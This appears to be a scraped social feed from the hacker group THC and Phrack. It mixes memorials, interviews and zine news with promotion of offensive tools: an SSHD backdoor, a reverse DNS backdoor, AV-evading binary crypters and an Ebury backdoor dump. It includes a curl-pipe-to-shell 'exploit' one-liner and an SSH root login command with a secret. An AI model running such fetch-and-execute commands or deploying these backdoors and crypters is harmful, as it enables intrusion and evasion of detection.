🤘 THC-RELEASE 🤘: Anonymous EMAIL FORWARDS. No Logz. No Limitz. FREE ✅

Grab your <USER>@reads.phrack.org or <USER>@segfault.net or @smokes.thc.org 😂 - and more.

👉https://mail.thc.org👈

Built by the legendary extencil

❤️RELEASE: The TEAM-TESO cvs:

thc.org/team-teso/

Exploits, advisories, teso-informational (never released), burneye ELF crypter, bscan mass scanner, …plus some rare pictures.

Which 7350 exploit was your favourite?

Enjoy & Keep hacking,

Yours Sincerely,
Team-Teso (via THC’s bsky account).

Jason Snitker - "Parmaster" Memorial Service - Feb 28, 2026 YouTube video by Deb Kavaler Wysopal

🕯️ Par’s Memorial 🕯️
Link below.

Please watch the CHAT video in the description.

Rest in peace, Jason Snitker
Legend. Always.

youtu.be/0qMRIZWCrJw?...

THC Release 💥: The world’s largest IP<>Domain database: ip.thc.org

All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.

Updated monthly.

Try: curl ip.thc.org/1.1.1.1

Raw data (187GB): ip.thc.org/docs/bulk-da...

(The fine work of messede 👌)

THC Release: 🎄Smallest SSHD backdoor🎄

- Does not add any new file
- Survives apt-update
- Does not use PAM or authorized_keys

Just SSHD trickery....adds one line only.

More at thc.org/tips 👌

Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷

More: thc.org/404

<stealth> we had joy we had fun we had a rootshell on a sun.

Ebury Version 1.8.2.e6

Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.

password to the server is "segfault".

EBury SSHD backdoor?? on 400,000 hosts?

Let's fuck around and find out.

Dissect, understand & ridicule. Join the group effort at thc.org/ops or SSH straight into the server and check ~/ebury:

ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net

Episode 8: Mohammed Bagha aka "MB" - WWSUL Mohammed Bagha, who keeps his hacker handles anonymous, was one of the most feared hackers of the 1990s, with a larger-than-life online persona and the skills to back it up.

Interview of "MB" @wwsul.bsky.social

wherewarlocksstayuplate.com/interview/mo...

You have inspired many. We are fans:⚡️🌊🎠

🇩🇪 German speaking only: THC member and @phrack.org staff on @heise.de podcast about Phrack's 40th, hacking and life in general.

Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:

c-skills.blogspot.com

PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. 🔥 #40yrsOfPhrack #phrack72

Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").

May want to discuss this with your therapist. 🤷‍♂️

www.sentinelone.com/labs/follow-...

Generate your own python-implant of a reverse DNS backdoor. thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.

🐣 CRACKME RESULTS are OUT! 💥

Congrats to rt_saber for being so quick.

Kudos to all those who hammered CloudFlare hard.

github.com/phrackzine/c...

ascii art easter bunny, by jgs

🐣HAPPY EASTER FROM PHRACK 🐣

PHRACK EASTER-2025 CHALLENGE: Find the hidden easter egg by solving the riddle:

👉ZGlnICtzaG9ydCBlZ2c/Pz8/LnBocmFjay5vcmcgVFhU👈

Details: github.com/phrackzine/c...

new FEATRUE in bincrypter. LOCK & ENCRYPT a binary to a target host. Will execute differently when uploaded to virustotal.com or any other but the target host.

Please don't set BC_LOCK="rm -rf ~/" 🙈

github.com/hackerschoic...

I've just been told that John Young of Cryptome.org passed away last week.

#Cryptome was foundational, and a predecessor to organizations like @ddosecrets.com and #Wikileaks.

RIP, John.

Episode 4: Eduart Steiner aka Skyper YouTube video by Where Warlocks Stay Up Late

🍿THC member on camera. A first. 😅
30 years of hacking - a perspective and a reflection. 📺 👉 Keep Hacking 👈 The next 30 years of hacking start today. ❤️ thanks @wwsul.bsky.social

www.youtube.com/watch?v=sQVL...

Ransomware groups will be raising extortion demands 10% due to Tariffs

CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL thc.org/7350pipe)%E2...

Paged Out! #6 has arrived! And it's jam-packed with content!
You can download it here:
pagedout.institute?page=issues....

THC RELEASE 🍺: A Linux Binary Runtime Crypter - in BASH 🙈 Works for ELF-binaries and Bash/Perl/Python/PHP-scripts alike (and obfuscates the scripts). 😝

github.com/hackerschoic...

THC's memexec now supports x86_64, aarch64, arm6/7 and mips64. The perl version is a 1-liner (cat /usr/bin/id | memexec) :> Helps to overcome noexec-mounts: 👉 github.com/hackerschoic...

The Hacker’s Manifesto. We are all alike.

table of contents for tmp.0ut volume 4

Would you look at that, it's tmp.0ut Volume 4! Happy Friday, hope you enjoy this latest issue!

tmpout.sh/4/

Afaik even in origin fetch they sync the origin session key to the edge, decrypt all at the edge and then re-encrypt with the origin session key…at least that’s how it used to be (always cleartext at the edge. They read all traffic. So does AWS or yandex and any other “edge” provider)

Password reuse is rampant: nearly half of observed user logins are compromised Nearly half of observed login attempts across websites protected by Cloudflare involved leaked credentials. The pervasive issue of password reuse is enabling automated bot attacks and account takeover...

Watching the Internet realise that CloudFlare decrypts ALL https traffic at the edge is hilarious. 🍿🍿🍿 👉👉👉 TLS only to the edge. Half-way. CF sees all your dirty secrets. 🍻

blog.cloudflare.com/password-reu...

#phrack Aug/2025 release >>> write an article and become immortalised.